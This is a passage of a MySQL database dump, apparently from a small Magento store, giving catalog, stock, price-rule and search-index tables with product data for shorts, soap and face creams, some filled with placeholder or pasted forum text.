-- Table structure for table `cataloginventory_stock_status`
--

CREATE TABLE `cataloginventory_stock_status` (
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `stock_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock ID',
  `qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty',
  `stock_status` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock Status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cataloginventory Stock Status';

--
-- Dumping data for table `cataloginventory_stock_status`
--

INSERT INTO `cataloginventory_stock_status` (`product_id`, `website_id`, `stock_id`, `qty`, `stock_status`) VALUES
(1776, 0, 1, 100.0000, 1),
(2052, 0, 1, 100.0000, 1),
(2053, 0, 1, 0.0000, 1),
(2054, 0, 1, 22.0000, 1),
(2055, 0, 1, 32.0000, 1),
(2057, 0, 1, 0.0000, 0),
(2058, 0, 1, 32.0000, 1),
(2059, 0, 1, 32.0000, 1),
(2060, 0, 1, 34.0000, 1),
(2061, 0, 1, 65.0000, 1),
(2062, 0, 1, 43.0000, 1),
(2063, 0, 1, 53.0000, 1),
(2064, 0, 1, 5.0000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `cataloginventory_stock_status_idx`
--

CREATE TABLE `cataloginventory_stock_status_idx` (
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `stock_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock ID',
  `qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty',
  `stock_status` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock Status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cataloginventory Stock Status Indexer Idx';

-- --------------------------------------------------------

--
-- Table structure for table `cataloginventory_stock_status_replica`
--

CREATE TABLE `cataloginventory_stock_status_replica` (
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `stock_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock ID',
  `qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty',
  `stock_status` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock Status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cataloginventory Stock Status';

--
-- Dumping data for table `cataloginventory_stock_status_replica`
--

INSERT INTO `cataloginventory_stock_status_replica` (`product_id`, `website_id`, `stock_id`, `qty`, `stock_status`) VALUES
(1776, 0, 1, 100.0000, 1),
(2052, 0, 1, 100.0000, 1),
(2053, 0, 1, 0.0000, 1),
(2054, 0, 1, 22.0000, 1),
(2055, 0, 1, 32.0000, 1),
(2057, 0, 1, 0.0000, 0),
(2058, 0, 1, 32.0000, 1),
(2059, 0, 1, 32.0000, 1),
(2060, 0, 1, 34.0000, 1),
(2061, 0, 1, 65.0000, 1),
(2062, 0, 1, 43.0000, 1),
(2063, 0, 1, 53.0000, 1),
(2064, 0, 1, 5.0000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `cataloginventory_stock_status_tmp`
--

CREATE TABLE `cataloginventory_stock_status_tmp` (
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `stock_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock ID',
  `qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty',
  `stock_status` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock Status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cataloginventory Stock Status Indexer Tmp';

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule`
--

CREATE TABLE `catalogrule` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `description` text DEFAULT NULL COMMENT 'Description',
  `from_date` date DEFAULT NULL COMMENT 'From',
  `to_date` date DEFAULT NULL COMMENT 'To',
  `is_active` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Active',
  `conditions_serialized` mediumtext DEFAULT NULL COMMENT 'Conditions Serialized',
  `actions_serialized` mediumtext DEFAULT NULL COMMENT 'Actions Serialized',
  `stop_rules_processing` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Stop Rules Processing',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `simple_action` varchar(32) DEFAULT NULL COMMENT 'Simple Action',
  `discount_amount` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Discount Amount'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CatalogRule';

--
-- Dumping data for table `catalogrule`
--

INSERT INTO `catalogrule` (`rule_id`, `name`, `description`, `from_date`, `to_date`, `is_active`, `conditions_serialized`, `actions_serialized`, `stop_rules_processing`, `sort_order`, `simple_action`, `discount_amount`) VALUES
(1, '20% off all Women’s and Men’s Pants', '20% off all Women’s and Men’s Pants', NULL, NULL, 1, '{\"type\":\"Magento\\\\CatalogRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\CatalogRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"()\",\"value\":\"32,23\",\"is_value_processed\":false}]}', '{\"type\":\"Magento\\\\CatalogRule\\\\Model\\\\Rule\\\\Action\\\\Collection\",\"attribute\":null,\"operator\":\"=\",\"value\":null}', 1, 0, 'by_percent', 20.000000);

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_customer_group`
--

CREATE TABLE `catalogrule_customer_group` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer Group ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Rules To Customer Groups Relations';

--
-- Dumping data for table `catalogrule_customer_group`
--

INSERT INTO `catalogrule_customer_group` (`rule_id`, `customer_group_id`) VALUES
(1, 0),
(1, 1),
(1, 2),
(1, 3);

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_group_website`
--

CREATE TABLE `catalogrule_group_website` (
  `rule_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rule ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CatalogRule Group Website';

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_group_website_replica`
--

CREATE TABLE `catalogrule_group_website_replica` (
  `rule_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rule ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CatalogRule Group Website';

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_product`
--

CREATE TABLE `catalogrule_product` (
  `rule_product_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule Product ID',
  `rule_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rule ID',
  `from_time` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'From Time',
  `to_time` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'To time',
  `customer_group_id` int(11) DEFAULT NULL,
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `action_operator` varchar(10) DEFAULT 'to_fixed' COMMENT 'Action Operator',
  `action_amount` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Action Amount',
  `action_stop` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Action Stop',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CatalogRule Product';

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_product_price`
--

CREATE TABLE `catalogrule_product_price` (
  `rule_product_price_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule Product PriceId',
  `rule_date` date NOT NULL COMMENT 'Rule Date',
  `customer_group_id` int(11) DEFAULT NULL,
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `rule_price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Rule Price',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `latest_start_date` date DEFAULT NULL COMMENT 'Latest StartDate',
  `earliest_end_date` date DEFAULT NULL COMMENT 'Earliest EndDate'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CatalogRule Product Price';

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_product_price_replica`
--

CREATE TABLE `catalogrule_product_price_replica` (
  `rule_product_price_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule Product PriceId',
  `rule_date` date NOT NULL COMMENT 'Rule Date',
  `customer_group_id` int(11) DEFAULT NULL,
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `rule_price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Rule Price',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `latest_start_date` date DEFAULT NULL COMMENT 'Latest StartDate',
  `earliest_end_date` date DEFAULT NULL COMMENT 'Earliest EndDate'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CatalogRule Product Price';

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_product_replica`
--

CREATE TABLE `catalogrule_product_replica` (
  `rule_product_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule Product ID',
  `rule_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rule ID',
  `from_time` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'From Time',
  `to_time` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'To time',
  `customer_group_id` int(11) DEFAULT NULL,
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `action_operator` varchar(10) DEFAULT 'to_fixed' COMMENT 'Action Operator',
  `action_amount` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Action Amount',
  `action_stop` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Action Stop',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CatalogRule Product';

-- --------------------------------------------------------

--
-- Table structure for table `catalogrule_website`
--

CREATE TABLE `catalogrule_website` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Rules To Websites Relations';

--
-- Dumping data for table `catalogrule_website`
--

INSERT INTO `catalogrule_website` (`rule_id`, `website_id`) VALUES
(1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `catalogsearch_fulltext_scope1`
--

CREATE TABLE `catalogsearch_fulltext_scope1` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` int(10) UNSIGNED NOT NULL COMMENT 'Attribute_id',
  `data_index` longtext DEFAULT NULL COMMENT 'Data index'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='catalogsearch_fulltext_scope1_tmp';

--
-- Dumping data for table `catalogsearch_fulltext_scope1`
--

INSERT INTO `catalogsearch_fulltext_scope1` (`entity_id`, `attribute_id`, `data_index`) VALUES
(2053, 73, 'Erika Running Short | Erika Running Short-32-Red'),
(2053, 74, 'WSH12'),
(2053, 75, 'A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety. &bull; Seafoam pattern running shorts.&bull; Elastic waistband.&bull; Snug fit.&bull; 4\'\' inseam.&bull; 76% premium brushed Nylon / 24% Spandex. | A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety. &bull; Seafoam pattern running shorts.&bull; Elastic waistband.&bull; Snug fit.&bull; 4\'\' inseam.&bull; 76% premium brushed Nylon / 24% Spandex.'),
(2053, 97, 'Enabled | Enabled'),
(2053, 123, 'erika-running-short | erika-running-short-32-red'),
(2053, 137, 'Taxable Goods | Taxable Goods'),
(2054, 73, 'G clean Handwash Liquid Soap Pump 200ml 200.00 ৳'),
(2054, 74, 'FF44'),
(2054, 75, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting products and showing them. I thought about creating a widget but I am not sure on how to show the products on the admin area. Could you please help me show specific products on homepage?'),
(2054, 76, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a'),
(2054, 97, 'Enabled'),
(2054, 123, 'g-clean-handwash-liquid-soap-pump-200ml-200-00'),
(2054, 137, 'Taxable Goods'),
(2055, 73, 'G clean Handwash Liquid Soap Pump 200ml'),
(2055, 74, 'FF45'),
(2055, 75, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting products and showing them. I thought about creating a widget but I am not sure on how to show the products on the admin area. Could you please help me show specific products on homepage?'),
(2055, 76, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting products and showing them. I thought about creating a widget but I am not sure on how to show the products on the admin area. Could you please help me show specific products on homepage?'),
(2055, 97, 'Enabled'),
(2055, 123, 'g-clean-handwash-liquid-soap-pump-200ml'),
(2055, 137, 'Taxable Goods'),
(2057, 74, 'GGGDF44'),
(2058, 73, 'Face Wash Ornamental lemon extract'),
(2058, 74, 'RAMY SPOT LESS FAIRNESS CREAM'),
(2058, 75, 'In the best formula of the Ramy brand, the new addition Ramy Spotless Fairness cream. Eliminates black spots and uneven colors on the face.'),
(2058, 76, 'In the best formula of the Ramy brand, the new addition Ramy Spotless Fairness cream.Eliminates black spots and uneven colors on the face.'),
(2058, 97, 'Enabled'),
(2058, 123, 'ramy-spot-less-fairness-cream'),
(2058, 137, 'Taxable Goods'),
(2059, 73, 'Face Wash Ornamental lemon extract'),
(2059, 74, 'HGF64'),
(2059, 75, 'Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ'),
(2059, 76, 'Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ'),
(2059, 97, 'Enabled'),
(2059, 123, 'ramy-moisturizeing-face-wash'),
(2059, 137, 'Taxable Goods'),
(2060, 73, 'Face Wash Ornamental lemon extract'),
(2060, 74, 'GH786'),
(2060, 75, 'Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ'),
(2060, 76, 'Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ'),
(2060, 97, 'Enabled'),
(2060, 123, 'ramy-moisturizeing-face-wash-ornamental-lemon-extract-made-from-natural'),
(2060, 137, 'Taxable Goods'),
(2061, 73, 'Ramy Spot Cleaner Cream'),
(2061, 74, 'Ramy Spot Cleaner Cream'),
(2061, 97, 'Enabled'),
(2061, 123, 'ramy-spot-cleaner-cream'),
(2061, 137, 'Taxable Goods'),
(2062, 73, 'new Ramy Mesta Guards'),
(2062, 74, 'DD53g'),
(2062, 75, 'roduct name: Ramy Mesta Guard Category: Face Care Cream. Slogan: Increase beauty (through healing Mesta). Active ingredients of the product: Allantoin, Zinc Oxide. Product Features and Benefits: Rich in Vitamin E'),
(2062, 76, 'roduct name: Ramy Mesta Guard Category: Face Care Cream. Slogan: Increase beauty (through healing Mesta). Active ingredients of the product: Allantoin, Zinc Oxide. Product Features and Benefits: Rich in Vitamin E'),
(2062, 97, 'Enabled'),
(2062, 123, 'ramy-mesta-guard'),
(2062, 137, 'Taxable Goods'),
(2063, 73, 'Ramy Mesta Guard Face'),
(2063, 74, 'Ramy Mesta Guard Face'),
(2063, 75, 'First, wash your face thoroughly with Ramy Facewash Wipe the face with a clean towel Now massage the Ramy Mesta Guard area (i.e. the surface of the Mesta ) well. Use at least 2 times a day. Do not stop using until the Mesta is removed.'),
(2063, 76, 'First, wash your face thoroughly with Ramy Facewash Wipe the face with a clean towel Now massage the Ramy Mesta Guard area (i.e. the surface of the Mesta ) well. Use at least 2 times a day. Do not stop using until the Mesta is removed.'),
(2063, 97, 'Enabled'),
(2063, 123, 'ramy-mesta-guard-face'),
(2063, 137, 'Taxable Goods'),
(2064, 73, 'New Spot'),
(2064, 74, 'New Spot'),
(2064, 97, 'Enabled'),
(2064, 123, 'new-spot'),
(2064, 137, 'Taxable Goods');

-- --------------------------------------------------------

--
-- Table structure for table `catalogsearch_recommendations`
--

CREATE TABLE `catalogsearch_recommendations` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `query_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Query ID',
  `relation_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Relation ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Advanced Search Recommendations';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_entity`
--

CREATE TABLE `catalog_category_entity` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_set_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute Set ID',
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Parent Category ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Creation Time',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Update Time',
  `path` varchar(255) NOT NULL COMMENT 'Tree Path',
  `position` int(11) NOT NULL COMMENT 'Position',
  `level` int(11) NOT NULL DEFAULT 0 COMMENT 'Tree Level',
  `children_count` int(11) NOT NULL COMMENT 'Child Count'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Table';

--
-- Dumping data for table `catalog_category_entity`
--

INSERT INTO `catalog_category_entity` (`entity_id`, `attribute_set_id`, `parent_id`, `created_at`, `updated_at`, `path`, `position`, `level`, `children_count`) VALUES
(1, 3, 0, '2020-08-02 13:12:57', '2020-08-24 00:59:48', '1', 0, 0, -9),
(2, 3, 1, '2020-08-02 13:13:01', '2020-08-24 00:59:48', '1/2', 1, 1, -10),
(4, 3, 2, '2020-08-03 07:45:23', '2020-08-28 05:46:10', '1/2/4', 2, 2, 0),
(6, 3, 2, '2020-08-03 07:48:10', '2020-08-28 05:47:10', '1/2/6', 5, 2, 0),
(8, 3, 2, '2020-08-08 01:40:46', '2021-05-27 05:42:52', '1/2/8', 5, 2, 0),
(16, 3, 2, '2020-08-08 01:42:28', '2020-08-24 00:59:48', '1/2/16', 4, 2, -6),
(43, 3, 2, '2020-08-08 01:45:06', '2020-08-19 04:31:02', '1/2/43', 1, 2, 0),
(46, 3, 2, '2020-08-17 05:00:40', '2020-08-24 00:59:48', '1/2/46', 9, 2, 0),
(47, 3, 2, '2020-08-24 00:59:35', '2020-08-24 01:07:04', '1/2/47', 3, 2, 0);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_entity_datetime`
--

CREATE TABLE `catalog_category_entity_datetime` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` datetime DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Datetime Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_datetime`
--

INSERT INTO `catalog_category_entity_datetime` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(3, 61, 0, 43, NULL),
(4, 62, 0, 43, NULL),
(5, 61, 0, 4, NULL),
(6, 62, 0, 4, NULL),
(7, 61, 0, 8, NULL),
(8, 62, 0, 8, NULL),
(9, 61, 0, 6, NULL),
(10, 62, 0, 6, NULL),
(11, 61, 0, 46, NULL),
(12, 62, 0, 46, NULL),
(13, 61, 0, 2, NULL),
(14, 62, 0, 2, NULL),
(15, 61, 0, 47, NULL),
(16, 62, 0, 47, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_entity_decimal`
--

CREATE TABLE `catalog_category_entity_decimal` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` decimal(20,6) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Decimal Attribute Backend Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_entity_int`
--

CREATE TABLE `catalog_category_entity_int` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` int(11) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Integer Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_int`
--

INSERT INTO `catalog_category_entity_int` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(1, 69, 0, 1, 1),
(2, 46, 0, 2, 1),
(3, 69, 0, 2, 1),
(9, 46, 0, 4, 1),
(10, 54, 0, 4, 1),
(11, 69, 0, 4, 1),
(12, 70, 0, 4, 0),
(13, 71, 0, 4, 0),
(19, 46, 0, 6, 1),
(20, 54, 0, 6, 1),
(21, 69, 0, 6, 1),
(22, 70, 0, 6, 0),
(23, 71, 0, 6, 0),
(29, 46, 0, 8, 1),
(30, 54, 0, 8, 0),
(31, 69, 0, 8, 0),
(53, 46, 0, 16, 1),
(54, 54, 0, 16, 0),
(55, 69, 0, 16, 1),
(134, 46, 0, 43, 0),
(135, 54, 0, 43, 0),
(136, 69, 0, 43, 1),
(143, 46, 0, 46, 1),
(144, 54, 0, 46, 1),
(145, 69, 0, 46, 1),
(146, 70, 0, 46, 0),
(147, 71, 0, 46, 0),
(151, 53, 0, 43, NULL),
(152, 70, 0, 43, 0),
(153, 71, 0, 43, 0),
(154, 53, 0, 4, NULL),
(155, 53, 0, 8, NULL),
(156, 70, 0, 8, 0),
(157, 71, 0, 8, 0),
(158, 53, 0, 6, NULL),
(159, 53, 0, 46, NULL),
(160, 53, 0, 2, 13),
(161, 54, 0, 2, 1),
(162, 70, 0, 2, 0),
(163, 71, 0, 2, 0),
(164, 46, 0, 47, 1),
(165, 53, 0, 47, 31),
(166, 54, 0, 47, 1),
(167, 69, 0, 47, 1),
(168, 70, 0, 47, 0),
(169, 71, 0, 47, 0);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_entity_text`
--

CREATE TABLE `catalog_category_entity_text` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` text DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Text Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_text`
--

INSERT INTO `catalog_category_entity_text` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(2, 50, 0, 4, 'cream'),
(6, 47, 0, 43, NULL),
(7, 50, 0, 43, NULL),
(8, 51, 0, 43, NULL),
(9, 47, 0, 4, NULL),
(10, 51, 0, 4, NULL),
(11, 47, 0, 8, NULL),
(12, 50, 0, 8, NULL),
(13, 51, 0, 8, NULL),
(14, 47, 0, 6, NULL),
(15, 50, 0, 6, NULL),
(16, 51, 0, 6, NULL),
(17, 47, 0, 46, NULL),
(18, 50, 0, 46, NULL),
(19, 51, 0, 46, NULL),
(20, 47, 0, 2, NULL),
(21, 50, 0, 2, NULL),
(22, 51, 0, 2, NULL),
(23, 47, 0, 47, '<p>sdsdsds</p>'),
(24, 50, 0, 47, NULL),
(25, 51, 0, 47, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_entity_varchar`
--

CREATE TABLE `catalog_category_entity_varchar` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Category Varchar Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_varchar`
--

INSERT INTO `catalog_category_entity_varchar` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(1, 45, 0, 1, 'Root Catalog'),
(2, 45, 0, 2, 'Default Category'),
(3, 52, 0, 2, 'PRODUCTS'),
(11, 45, 0, 4, 'Cream'),
(12, 49, 0, 4, 'cream'),
(13, 52, 0, 4, 'PRODUCTS'),
(14, 60, 0, 4, '4'),
(15, 63, 0, 4, NULL),
(16, 121, 0, 4, 'cream'),
(17, 122, 0, 4, 'cream'),
(25, 45, 0, 6, 'Grocery'),
(26, 49, 0, 6, 'grocery'),
(27, 52, 0, 6, 'PRODUCTS'),
(28, 60, 0, 6, '4'),
(29, 63, 0, 6, NULL),
(30, 121, 0, 6, 'grocery'),
(31, 122, 0, 6, 'grocery'),
(39, 45, 0, 8, 'Powder'),
(40, 52, 0, 8, 'PAGE'),
(41, 121, 0, 8, 'gear'),
(42, 122, 0, 8, 'gear'),
(66, 45, 0, 16, 'Men'),
(67, 52, 0, 16, 'PAGE'),
(68, 121, 0, 16, 'men'),
(69, 122, 0, 16, 'men'),
(151, 45, 0, 43, 'What\'s New'),
(152, 52, 0, 43, 'PAGE'),
(153, 121, 0, 43, 'what-is-new'),
(154, 122, 0, 43, 'what-is-new'),
(166, 45, 0, 46, 'Cosmetics'),
(167, 52, 0, 46, 'PRODUCTS'),
(168, 60, 0, 46, '4'),
(169, 63, 0, 46, NULL),
(170, 121, 0, 46, 'cosmetics'),
(171, 122, 0, 46, 'cosmetics'),
(179, 48, 0, 43, NULL),
(180, 49, 0, 43, NULL),
(181, 60, 0, 43, NULL),
(182, 63, 0, 43, NULL),
(185, 48, 0, 4, NULL),
(187, 48, 0, 8, NULL),
(188, 49, 0, 8, NULL),
(189, 60, 0, 8, NULL),
(190, 63, 0, 8, NULL),
(192, 48, 0, 6, NULL),
(194, 48, 0, 46, NULL),
(195, 49, 0, 46, NULL),
(196, 48, 0, 2, NULL),
(197, 49, 0, 2, NULL),
(198, 60, 0, 2, NULL),
(199, 63, 0, 2, NULL),
(200, 121, 0, 2, 'default-category'),
(201, 122, 0, 2, NULL),
(202, 45, 0, 47, 'Discounted Products'),
(203, 52, 0, 47, 'PAGE'),
(204, 121, 0, 47, 'discounted-products'),
(205, 122, 0, 47, 'discounted-products'),
(208, 48, 0, 47, NULL),
(209, 49, 0, 47, NULL),
(210, 60, 0, 47, NULL),
(211, 63, 0, 47, '2columns-left');

-- --------------------------------------------------------

--
-- Table structure for table `catalog_category_product`
--

CREATE TABLE `catalog_category_product` (
  `entity_id` int(11) NOT NULL COMMENT 'Entity ID',
  `category_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Category ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `position` int(11) NOT NULL DEFAULT 0 COMMENT 'Position'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product To Category Linkage Table';

